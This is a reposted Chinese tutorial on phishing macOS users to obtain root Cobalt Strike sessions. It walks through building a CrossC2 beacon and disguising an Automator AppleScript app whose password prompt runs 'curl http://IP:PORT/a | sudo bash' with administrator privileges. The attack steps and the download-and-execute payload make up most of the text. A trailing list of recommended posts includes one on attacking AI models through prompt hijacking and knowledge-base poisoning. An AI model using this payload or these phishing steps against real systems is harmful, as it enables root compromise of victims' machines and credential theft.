MAC钓鱼并Root权限上线CS并权限维持,以及所有的坑如何解决

本文转载于:https://www.freebuf.com/articles/web/350592.html
作者:文鸯@涂鸦智能安全实验室

制作MAC

一、下载工具

首先从github上下载CrossC2。链接:https://github.com/gloxec/CrossC2/releases/tag/v3.1.0。

根据你CS客户端的操作系统选择这里面的对应版本,以及CorssC2-githubBot-2022-06-07.cna这个CS插件。

二、CrossC2使用

首先用编辑器打开CorssC2-githubBot-2022-06-07.cna插件。

将红色框出来的位置填上CrossC2

可执行文件的绝对路径(linux和mac版本要使用chmod +x 添加执行权限)。

然后去CS中添加插件即可。


注意:这里的linster要用https的监听。

在生成木马时一定要注意需要将cs服务端中的.cobaltstrike.beacon_keys复制到客户端上,在红框处选中文件即可。

这里的ProcessName是木马启动后在主机上的进程名,然后点机Build即可。在CS的log中会出现一个curl的命令,只需在被攻击机上执行便会上线。

三、Root Mac app木马的制作

1、工具

2、木马创建

打开automator.app,并且点击到运行Applescript。

这是我们的木马程序,大致意思是执行我们的木马程序并且以root身份执行(此处的代码是从mac官方找到的模版)。

复制代码
set unixDesktopPath to POSIX path of "/System/Library/User Template/"
set quotedUnixDesktopPath to quoted form of unixDesktopPath
set fromUnix to do shell script " curl \-A O \-o\- \-L http://IP:PORT/a \|sudo bash \-s " & quotedUnixDesktopPath with administrator privileges

end ru

制作好后点击保存即可

3、运行

当点击这里的制作好的app程序会弹出输入密码的提示框(这里是做钓鱼时使用的木马,弹窗的名字都是以任意更改的)。

当一输入密码就会上线到我们的CS上,此时CS上的用户是root。

权限维持

权限维持等下一期出,感谢大家的关注。

相关推荐
Amy187021118233 小时前
筑牢算力底座的安全防线:直流绝缘监测如何为固态变压器保驾护航
安全
HackTwoHub3 小时前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
Kyrie6783 小时前
为什么我们不能等待更好的后量子签名算法
安全
长风2304 小时前
Day 16:大屏呈现——管理层视角 Dashboard 设计
人工智能·安全
头茬韭菜4 小时前
4.1-4.2 工具注册 — Fail-Closed 类型安全设计与四层工具架构
java·安全·架构
Sirius Wu5 小时前
OpenClaw SubAgent 三层安全约束完整详解
人工智能·安全·ai·架构·aigc
昊星自动化5 小时前
昊星自动化携智慧实验室环境管理系统亮相2026 青岛蓝博化工装备展,助力实验室安全节能双效协同
安全·自动化·实验室建设·文丘里阀·房间通风控制
Bruce_Liuxiaowei5 小时前
一次内网横向移动实战:从一个 5900 端口到穿越防火墙
运维·网络·安全
2601_9623649715 小时前
Windows Hello VS 传统密码:身份认证安全层级全面对比分析
windows·安全·电脑
2601_9571746520 小时前
零基础学网络安全能学好吗
安全·web安全